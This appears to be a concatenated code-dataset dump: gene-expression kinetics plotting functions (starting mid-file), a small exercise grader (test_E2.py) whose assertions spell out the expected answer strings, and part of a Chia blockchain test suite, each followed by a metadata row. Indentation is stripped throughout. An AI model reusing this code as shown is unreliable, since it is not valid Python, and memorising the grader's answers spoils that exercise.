ax.plot(T_uniq, cur_X_data[[2, 3]].T, "k--")
ax.legend(title_[2:4])
ax.set_title(gene_name)
else:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j < max_line_plots)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 2]])
else:
ax.legend([title_[j + 1]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_deg_det(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = ["M_ul", "M_sl"]
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
layer_u, layer_s = "M_ul", "M_sl"
else:
title_ = ["X_ul", "X_sl"]
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
layer_u, layer_s = "X_ul", "X_sl"
_, X_raw = prepare_data_has_splicing(
adata,
genes,
T,
layer_u=layer_u,
layer_s=layer_s,
total_layers=layers,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n"]
total_layer = "M_t"
layer = "M_n"
else:
title_ = ["X_new"]
total_layer = "X_total"
layer = "X_new"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.65,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \gamma$" + ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
if show_variance:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
if has_splicing:
ax.plot(T_uniq, cur_X_fit_data[j], "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
else:
ax.plot(T_uniq, cur_X_fit_data.flatten(), "b")
ax.plot(T_uniq, cur_X_data.flatten(), "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
else:
ax.plot(T_uniq, cur_X_fit_data.T)
ax.legend(title_)
ax.plot(T_uniq, cur_X_data.T, "k--")
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
if has_splicing:
ax.plot(t, true_p[j], "r")
else:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_deg_sto(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_moms_fit,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = ["M_ul", "M_sl", "M_ul2", "M_sl2", "M_ul_sl"] if show_moms_fit else ["M_ul", "M_sl"]
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
layer_u, layer_s = "M_ul", "M_sl"
else:
title_ = ["X_ul", "X_sl", "X_ul2", "X_sl2", "X_ul_sl"] if show_moms_fit else ["X_ul", "X_sl"]
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
layer_u, layer_s = "X_ul", "X_sl"
_, X_raw = prepare_data_has_splicing(
adata,
genes,
T,
layer_u=layer_u,
layer_s=layer_s,
total_layers=layers,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_n2"] if show_moms_fit else ["M_n"]
total_layer = "M_t"
layer = "M_n"
else:
title_ = ["X_new", "X_n2"] if show_moms_fit else ["X_new"]
total_layer = "X_total"
layer = "X_new"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.65,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \gamma$" + ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if j == 0:
if has_splicing:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.legend(title_[:2])
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
else:
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.legend(labels=[title_[j]])
ax.plot(T_uniq, cur_X_data[j].T, "k--")
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j == 0)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 1]])
else:
ax.legend([title_[j]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_kin_twostep(
adata,
genes,
has_splicing,
use_smoothed,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
grp_len,
sub_plot_n,
ncols,
gs,
fig_mat,
gene_order,
true_param_prefix,
true_params,
est_params,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
mapper = get_mapper()
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
unique_labels = np.unique(T_uniq)
color_key = _to_hex(plt.get_cmap("viridis")(np.linspace(0, 1, len(unique_labels))))
new_color_key = {k: color_key[i] for i, k in enumerate(unique_labels)}
colors = pd.Series(T).map(new_color_key).values
r2 = adata[:, genes].var["gamma_r2"]
mean_R2 = adata[:, genes].var["mean_R2"]
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
r = adata[:, gene_name].layers[mapper["X_total"]] if use_smoothed else adata[:, gene_name].layers["X_total"]
n = adata[:, gene_name].layers[mapper["X_new"]] if use_smoothed else adata[:, gene_name].layers["X_new"]
r = r.A.flatten() if issparse(r) else r.flatten()
n = n.A.flatten() if issparse(n) else n.flatten()
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
if cur_logLL is not None:
ax.text(
0.05,
0.99,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
ax.scatter(r, n, c=colors, alpha=0.25, ec=None)
legend_elements = [
# Patch(facecolor=color_key[i], label=k)
Line2D(
[0],
[0],
marker="o",
color=color_key[ind],
label=k,
linestyle="None",
)
for ind, k in enumerate(T_uniq)
]
ax.legend(
handles=legend_elements,
bbox_to_anchor=(0.9, 1),
loc="upper left",
ncol=len(T_uniq) // 15 + 1,
)
xnew = np.linspace(np.min(r), np.max(r) * 0.80)
for ind in range(len(cur_X_data)):
ax.plot(
xnew,
xnew * cur_X_data[ind],
dashes=[6, 2],
lw=4,
c=new_color_key[T_uniq[ind]],
)
if use_smoothed:
ax.set_xlabel("total (1st moment)")
ax.set_ylabel("new (1st moment)")
else:
ax.set_xlabel("total (size factor normalized only)")
ax.set_ylabel("new (size factor normalized only)")
ax.set_title(gene_name)
ax.text(
0.05,
0.6,
"<r2> = %.4f" % (mean_R2[i]),
ha="left",
va="center",
transform=ax.transAxes,
)
elif j == 1:
# y-axis should be -np.log(1 - cur_X_data)
ax.scatter(T_uniq, -np.log(1 - cur_X_data), c=color_key)
ax.scatter(T_uniq, cur_X_fit_data, c="r")
ax.plot(
T_uniq,
cur_X_fit_data,
dashes=[6, 2],
c="k",
)
ax.set_xlabel("Time (" + unit + ")")
ax.set_ylabel("-log(1-k)")
ax.text(
0.05,
0.6,
"r2 = %.4f" % (r2[i]),
ha="left",
va="center",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.05,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.05,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.05,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.05,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
return gs
def plot_kin_deg_twostep(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
layer = "M_n" if ("M_n" in adata.layers.keys() and use_smoothed) else "X_new"
total_layer = "M_t" if ("M_t" in adata.layers.keys() and use_smoothed) else "X_total"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
for i, gene_name in enumerate(genes):
cur_X_data, cur_logLL = X_data[i], logLL[i]
cur_X_fit_data, cur_tt, cur_h = (
X_fit_data[i][0],
X_fit_data[i][1][0],
X_fit_data[i][1][1],
)
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.9,
0.99,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_variance:
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data, "b") # ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data, "k--") # ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_ylabel("labeled")
ax.set_title(gene_name + str(cur_logLL))
else:
ax.plot(T_uniq, cur_X_fit_data.T, "b")
ax.plot(T_uniq, cur_X_data, "k--")
ax.set_ylabel("labeled")
ax.set_title(gene_name + str(cur_logLL))
elif j == 1:
ax.plot(cur_tt, cur_h, "b")
ax.plot(cur_tt, cur_h, "r*")
ax.set_ylabel("labeled")
ax.legend(["model (deterministic)", "model (kinetic chase)"])
ax.set_title("unseen initial conc.")
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.80,
0.6,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.80,
0.6,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
if use_smoothed:
ax.set_ylabel("labeled (1st moment)")
else:
ax.set_ylabel("labeled (size factor normalized only)")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
| 37.665176 | 116 | 0.37138 | 8,063 | 75,820 | 3.253008 | 0.031006 | 0.016928 | 0.012963 | 0.032407 | 0.951352 | 0.938808 | 0.92859 | 0.924854 | 0.921118 | 0.911701 | 0 | 0.026251 | 0.506621 | 75,820 | 2,012 | 117 | 37.683897 | 0.674909 | 0.025231 | 0 | 0.881679 | 0 | 0 | 0.072041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004907 | false | 0 | 0.008724 | 0 | 0.018539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7ca15907e22324a79c12cb519eacced0bb895698 | 1,845 | py | Python | exercises/test_E2.py | dataXcode/IPP | c9b94ad2d7dc14b01e6657a4fa555507bbc7e93b | [
"MIT"
] | null | null | null | exercises/test_E2.py | dataXcode/IPP | c9b94ad2d7dc14b01e6657a4fa555507bbc7e93b | [
"MIT"
] | null | null | null | exercises/test_E2.py | dataXcode/IPP | c9b94ad2d7dc14b01e6657a4fa555507bbc7e93b | [
"MIT"
] | null | null | null | def test():
# Test
assert("my_room > 12 and my_room < 25" in __solution__ or "my_room> 12 and my_room < 25" in __solution__ or "my_room >12 and my_room < 25" in __solution__ or "my_room>12 and my_room < 25" in __solution__
or "my_room > 12 and my_room< 25" in __solution__ or "my_room > 12 and my_room< 25" in __solution__ or "my_room > 12 and my_room <25" in __solution__ or "my_room>12 and my_room<25" in __solution__
or "my_room> 12 and my_room< 25" in __solution__ or "my_room> 12 and my_room< 25" in __solution__ or "my_room> 12 and my_room <25" in __solution__ or "my_room> 12 and my_room<25" in __solution__
or "my_room >12 and my_room< 25" in __solution__ or "my_room >12 and my_room< 25" in __solution__ or "my_room > 12 and my_room <25" in __solution__ or "my_room > 12 and my_room<25" in __solution__
), "اجابة خاطئة: في النقطة الاولى لم تقم بعملية المقارنة بشكل صحيح"
assert("my_room * 2 > your_room * 3" in __solution__ or "my_room* 2 > your_room * 3" in __solution__ or "my_room *2 > your_room * 3" in __solution__ or "my_room*2 > your_room * 3" in __solution__
or "my_room * 2 > your_room* 3" in __solution__ or "my_room * 2 > your_room *3" in __solution__ or "my_room * 2 > your_room*3" in __solution__ or "my_room*2 > your_room*3" in __solution__
or "my_room* 2 > your_room* 3" in __solution__ or "my_room* 2 > your_room *3" in __solution__ or "my_room* 2 > your_room*3" in __solution__ or "my_room* 2 > your_room*3" in __solution__
or "my_room *2 > your_room* 3" in __solution__ or "my_room *2 > your_room *3" in __solution__ or "my_room *2 > your_room*3" in __solution__ or "my_room *2 > your_room*3" in __solution__
), "اجابة خاطئة: في النقطة الثانية لم تقم بعملية المقارنة بشكل صحيح"
__msg__.good("اجابة صحيحة. احسنت")
| 123 | 207 | 0.695935 | 334 | 1,845 | 3.257485 | 0.08982 | 0.264706 | 0.330882 | 0.386029 | 0.946691 | 0.946691 | 0.863971 | 0.863971 | 0.863971 | 0.863971 | 0 | 0.066207 | 0.214092 | 1,845 | 14 | 208 | 131.785714 | 0.684138 | 0.002168 | 0 | 0.5 | 0 | 0 | 0.532898 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | true | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
7caf072409a63294317f4c81ebcacf310834f41a | 29,859 | py | Python | tests/full_node/test_blockchain.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | 2 | 2019-12-06T01:03:24.000Z | 2020-09-27T00:46:20.000Z | tests/full_node/test_blockchain.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | 1 | 2020-11-01T15:24:50.000Z | 2020-11-01T15:24:50.000Z | tests/full_node/test_blockchain.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | null | null | null | import asyncio
import time
from pathlib import Path
from secrets import token_bytes
import aiosqlite
import pytest
from blspy import AugSchemeMPL
from src.full_node.blockchain import Blockchain, ReceiveBlockResult
from src.types.full_block import FullBlock
from src.types.header import Header, HeaderData
from src.types.proof_of_space import ProofOfSpace
from src.util.ints import uint8, uint64, uint32
from src.util.errors import Err
from src.types.sized_bytes import bytes32
from src.types.pool_target import PoolTarget
from src.full_node.block_store import BlockStore
from src.full_node.coin_store import CoinStore
from src.consensus.find_fork_point import find_fork_point_in_chain
from src.util.make_test_constants import make_test_constants_with_genesis
test_constants, bt = make_test_constants_with_genesis(
{
"DIFFICULTY_STARTING": 1,
"DISCRIMINANT_SIZE_BITS": 8,
"BLOCK_TIME_TARGET": 10,
"DIFFICULTY_EPOCH": 6, # The number of blocks per epoch
"DIFFICULTY_WARP_FACTOR": 3,
"DIFFICULTY_DELAY": 2, # EPOCH / WARP_FACTOR
"MIN_ITERS_STARTING": 50 * 1,
"NUMBER_ZERO_BITS_CHALLENGE_SIG": 1,
}
)
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
class TestGenesisBlock:
@pytest.mark.asyncio
async def test_basic_blockchain(self):
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
coin_store = await CoinStore.create(connection)
store = await BlockStore.create(connection)
bc1 = await Blockchain.create(coin_store, store, test_constants)
assert len(bc1.get_current_tips()) == 1
genesis_block = bc1.get_current_tips()[0]
assert genesis_block.height == 0
assert (bc1.get_next_difficulty(genesis_block)) == genesis_block.weight
assert bc1.get_next_min_iters(bc1.genesis) > 0
await connection.close()
bc1.shut_down()
class TestBlockValidation:
@pytest.fixture(scope="module")
async def initial_blockchain(self):
"""
Provides a list of 10 valid blocks, as well as a blockchain with 9 blocks added to it.
"""
blocks = bt.get_consecutive_blocks(test_constants, 10, [], 10)
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
store = await BlockStore.create(connection)
coin_store = await CoinStore.create(connection)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for i in range(1, 9):
result, removed, error_code = await b.receive_block(blocks[i])
assert result == ReceiveBlockResult.ADDED_TO_HEAD
yield (blocks, b)
await connection.close()
@pytest.mark.asyncio
async def test_prev_pointer(self, initial_blockchain):
blocks, b = initial_blockchain
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
HeaderData(
blocks[9].header.data.height,
bytes([1] * 32),
blocks[9].header.data.timestamp,
blocks[9].header.data.filter_hash,
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
),
blocks[9].header.plot_signature,
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert (result) == ReceiveBlockResult.DISCONNECTED_BLOCK
assert error_code is None
@pytest.mark.asyncio
async def test_prev_block(self, initial_blockchain):
blocks, b = initial_blockchain
block_bad = blocks[10]
result, removed, error_code = await b.receive_block(block_bad)
assert (result) == ReceiveBlockResult.DISCONNECTED_BLOCK
assert error_code is None
@pytest.mark.asyncio
async def test_timestamp(self, initial_blockchain):
blocks, b = initial_blockchain
# Time too far in the past
new_header_data = HeaderData(
blocks[9].header.data.height,
blocks[9].header.data.prev_header_hash,
blocks[9].header.data.timestamp - 1000,
blocks[9].header.data.filter_hash,
blocks[9].header.data.proof_of_space_hash,
blocks[9].header.data.weight,
blocks[9].header.data.total_iters,
blocks[9].header.data.additions_root,
blocks[9].header.data.removals_root,
blocks[9].header.data.farmer_rewards_puzzle_hash,
blocks[9].header.data.total_transaction_fees,
blocks[9].header.data.pool_target,
blocks[9].header.data.aggregated_signature,
blocks[9].header.data.cost,
blocks[9].header.data.extension_data,
blocks[9].header.data.generator_hash,
)
block_bad = FullBlock(
blocks[9].proof_of_space,
blocks[9].proof_of_time,
Header(
new_header_data,
bt.get_plot_signature(
new_header_data, blocks[9].proof_of_space.plot_public_key
),
),
blocks[9].transactions_generator,
blocks[9].transactions_filter,
)
result, removed, error_code = await b.receive_block(block_bad)
assert (result) == ReceiveBlockResult.INVALID_BLOCK
assert error_code == Err.TIMESTAMP_TOO_FAR_IN_PAST
